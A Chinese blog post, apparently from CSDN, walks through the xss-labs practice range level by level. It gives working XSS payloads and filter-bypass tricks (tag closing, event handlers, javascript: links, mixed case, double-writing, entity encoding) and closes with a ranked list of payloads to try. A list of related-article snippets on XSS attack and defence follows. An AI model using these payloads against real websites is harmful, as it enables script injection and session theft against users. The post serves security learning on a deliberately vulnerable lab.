xss攻击思路

已于 2023-11-20 19:54:51 修改
阅读量66 收藏 2
点赞数 3
文章标签: xss 前端 网络安全 安全 web安全
于 2023-11-20 19:54:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59047731/article/details/134517217
版权

xss攻击思路(xsslabs靶场举例)

在这里插入图片描述

靶场思路

1、第一关:

<script>alert(1)</script>

在这里插入图片描述

2、第二关:

<script>alert(1)</script>

在这里插入图片描述

发现没有成功弹出提示框,于是就右键检查源代码观察

在这里插入图片描述

尝试闭合标签

通过上面源代码发现输入的值都在value中,只是没有被执行,所以尝试闭合value

value="">(前面闭合了)这里填上我们要执行的代码即可 "

"><script>alert(1)</script>

3、第三关:

<script>alert(1)</script>                       //失败

发现标签被实体化

<script>alert(1)</script>

加粗样式
**

尝试事件,

不知道怎么闭合的可以先用试试,看看上传后源码是什么样子

'1'

在这里插入图片描述

可以用 onmouseover 和 onmouseout 两个属性来设置鼠标移入和移出的事件。
' onmouseover='alert(1)

4、第四关:

<script>alert(1)</script>

还是过滤尖括号

尝试事件绕过,发现是双引号

" onfocus="alert(1)

5、第五关:

<script>alert(1)</script>

尝试大小写绕过,发现还是不行

<ScRIpt>alert(1)</ScRIpt>

事件,发现也存在过滤

在这里插入图片描述

尝试伪协议

"><a href="javascript:alert(1)">点我</a>

在这里插入图片描述

6、第六关

<script>alert(1)</script>

还是被过滤

script => scr_ipt

尝试大小写绕过

"><SCrIpt>alert(1)</SCrIpt>

在这里插入图片描述

7、第七关:

<script>alert(1)</script>

还是被过滤script

尝试双写绕过

"><scrscriptipt>alert(1)</scriscriptpt>

在这里插入图片描述

8、第八关:

<script>alert(1)</script>

过滤了script=> scr_ipt

查看源码发现传入的内容在href里面

<a href="javascr_ipt:alert(1)">

所以,尝试了为协议,也被过滤

javascript:alert(1)  ==>  javascr_ipt:alert(1)

判断过滤了哪些字符,发现全部被过滤

src onfocus script onerror javascript

考虑编码绕过,unicode

在线网站:https://www.sojson.com/unicode.html

<a herf="javascript:alert(1)"></a>

编码

&#60;&#97;&#32;&#104;&#101;&#114;&#102;&#61;&#34;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#62;&#28857;&#20987;&#60;&#47;&#97;&#62;

9、总结

尝试顺序
1、经典公式
<script>alert(1)</script>

2、经典公式大小写
<scRIpt>alert(1)</scRIpt>

3、经典公式双写
<scRscRIptIpt>alert(1)</scRscRIptIpt>

4、事件单引号
' onmouseover='alert(1)

5、事件双引号
" onmouseover='alert(1)

6、a标签
"><a href="javascript:alert(1)">点我</a>

7、万般无奈才尝试编码

反射型注入就是在不断尝试中成功的

落樱坠入星野
关注
XSS攻击及防御总结和各平台通关思路
qq_43710889的博客
08-05 3533
XSS原理 跨站脚本攻击XSS(cross site scripting)。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采用cookie窃取、会话劫持、钓鱼欺骗等各种攻击。 漏洞存在的主要原因: 参数输入未经过安全过滤 恶意脚本被输出到网页 用户的浏览器执行了恶意脚本 XSS漏洞分类 1.反射型XSS 也称非持久型、参数型跨站脚本。主要用于恶意脚本附加在URL地址的参数中。他需要欺骗
XSS攻击修改服务器的代码,Web安全系列之XSS攻击
weixin_36202642的博客
08-11 1687
什么是XSS攻击XSS(Cross Site Scripting)中文名称是:跨站脚本攻击。XSS重点不在跨站,而在于执行的脚本。XSS的原理是指攻击者利用网站的安全漏洞,向web页面中插入一段恶意的script代码,当用户浏览网页时,执行脚本,攻击者就可以非法获取用户的敏感信息(如cookie、账号密码等),从而达到攻击的目的。XSS的类型从攻击代码的工作方式可以分为三个类型:1、反射型XSS。...
详解 XSS 攻击原理
听得到微笑的博客
10-29 1万+
跨站脚本攻击(Cross Site Scripting)本来的缩写为CSS,为了与层叠样式表(Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS。因此XSS是跨站脚本的意思。XSS跨站脚本攻击(Cross Site Scripting)的本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 8919
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
XSS 攻击
Wy_so_serious的博客
12-14 387
由于后端有可能返回给前端的数据是带标签的格式的,此时我们就需要使用 <div dangerouslySetInnerHTML={{___html:content}} /> 将标签都去掉,但是伴随着就会出现一个问题,那就是会受到XSS攻击 XSS攻击 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS攻击通常指的是通过利用网
XSS攻击以及java应对措施
qq_43456605的博客
05-18 5467
随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行 “查漏补缺”。XSS 全称 Cross Site Scripting,跨站脚本攻击。
Springboot 阻止XSS攻击
果然的博客
11-24 1万+
Springboot中阻止XSS攻击 写在前面 写此文章的目的是为了记录一下在工作中解决的 XSS漏洞 问题。 XSS漏洞是生产上比较常见的问题。虽然是比较常见并且是基本的安全问题,但是我们没有做????️ ,也怪我没有安全意识。于是终于有一天被制裁了。所以这次就补上了,记录一下。 看看问题 XSS 漏洞到底是什么,说实话我讲不太清楚。但是可以通过遇到的现象了解一下。在前端Form表单的输入框中,用户没有正常输入,而是输入了一段代码:</input><img src=1 onerror=a
XSS实战攻击思路总结
zhangge3663的博客
02-01 2545
前言 前几天看到B站up主公孙田浩投稿的视频「QQ被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气......实际上这就是一个中规中矩的XSS漏洞案例,在安全圈子里面应该也算是基本操作,正好博客以前没有记录过类似的文章,那么本文就来还原一下这个攻击过程。 鉴别网站 下面是一个经典的 QQ 空间钓鱼网站: 域名分析 钓鱼网站最直观的就是看域名,可以看到目标网站域名: qq.xps.com,尽管域名中出现了qq字样,但是一级域名却是xps.com这一点就直接暴露
关于XSS攻击及其防御
Wang的专栏
06-04 3906
【代码】关于XSS攻击及其防御。
什么是 XSS 攻击,如何避免?
热门推荐
ConstXiong
07-05 1万+
什么是 XSS 攻击,如何避免? XSS 攻击,即跨站脚本攻击(Cross Site Scripting),它是 web 程序中常见的漏洞。 原理 攻击者往 web 页面里插入恶意的 HTML 代码(Javascript、css、html 标签等),当用户浏览该页面时,嵌入其中的 HTML 代码会被执行,从而达到恶意攻击用户的目的。如盗取用户 cookie 执行一系列操作,破坏页...
百度内部通用XSS攻击解决方案探讨培训ppt
03-20
7. 解决方案:百度内部通用XSS攻击解决方案探讨培训ppt,总结了一些解决XSS攻击的方法和思路,帮助开发者和安全工程师更好地理解和防御XSS攻击。 8. 安全策略:统一登录分散认证,核心思想:BDUSS+STOKEN,BDUSS...
xss特殊字符拦截与过滤
04-01
XSS攻击是指攻击者通过在Web页面插入恶意脚本代码,当其他用户浏览这些页面时,嵌入其中的脚本就会执行,从而盗取用户信息或者篡改网页。本篇代码展示了如何通过编程手段拦截和过滤这些危险代码,保障Web应用程序的...
CTFHUB技能树之XSS——反射型
weixin_73049307的博客
10-19 547
在地址栏中可以看到有GET传参,正好对应第一个输入框的CTFHub,猜测是会通过第一个输入框来影响输出的内容(有个大大的“Hello,CTFHub”)出现“successfully”,第二个输入框应该是在后台访问注入的信息。(这里我就不新建了,之前新建过了)可以看到通过该输入,改变页面内容。(一般会有声音提醒上线了)
利用配置错误的负载均衡器,通过XSS窃取Cookies
zkaq7777777的博客
10-14 708
通过将负载均衡器的主机头注入漏洞与XSS攻击结合,攻击者绕过了Cookies的保护机制,获得了未授权的敏感信息。在测试过程中,发现了负载均衡器的一个漏洞,该漏洞允许注入主机头(Host-Header)。通过注入自定义的 X-Forwarded-Host 头,攻击者能够混淆负载均衡器的 Cookie 检查,使其将 Cookies 转发到攻击者自己的服务器,而不是授权服务器(authz server)。这种注入会导致负载均衡器将 Cookies 转发到攻击者的协作服务器,而不是合法的授权服务器。
CTFHUB技能树之XSS——存储型
最新发布
weixin_73049307的博客
10-19 118
发现地址栏中的URL没有GET传参,而且这次是“Hello,no name”
[渗透测试] XSS跨站点脚本攻击 零基础入门教程
Da1NtY的博客
10-15 1095
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击。攻击者在合法的网站或Web应用程序中执行恶意脚本。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSSXSS主要使用JS来执行恶意攻击,因为JS可以操控HTML、CSS、浏览器等,所有就给了攻击者可乘之机。
DAY52WEB 攻防-XSS 跨站&反射型&存储型&DOM 型&标签闭合&输入输出&JS 代码解析
m0_74402888的博客
10-16 832
解决方式:使用特定的语句进行替换,如**x onerror=”alert(1)”**如果你将 onerror="alert(1)" 嵌入到某个 HTML 元素中,那么当该元素加载失败时(例如图像加载失败、脚本加载失败等),JavaScript 中的 alert(1) 将会被执行,弹出一个带有 “1” 的警告框。通过URL访问该页面http://192.168.137.1:84/domxss.html#https://www.baidu.com)并在**#后面跟上,想要跳转的页面,访问即可成功跳转**
06_实现watch
qq_53109172的博客
10-16 1159
watch 本质上就是监听一个响应式数据,这个响应式数据发生变化的时候,进行通知并触发相应的回调函数。
xss漏洞挖掘思路包括
05-24
以下是一些常见的 XSS 漏洞挖掘思路: 1. 输入点测试:检查应用程序中任何通过用户输入向服务器发送数据的位置,例如表单、搜索框、评论框等。 2. 输出点测试:检查应用程序中任何将数据呈现给用户的位置,例如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落樱坠入星野

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值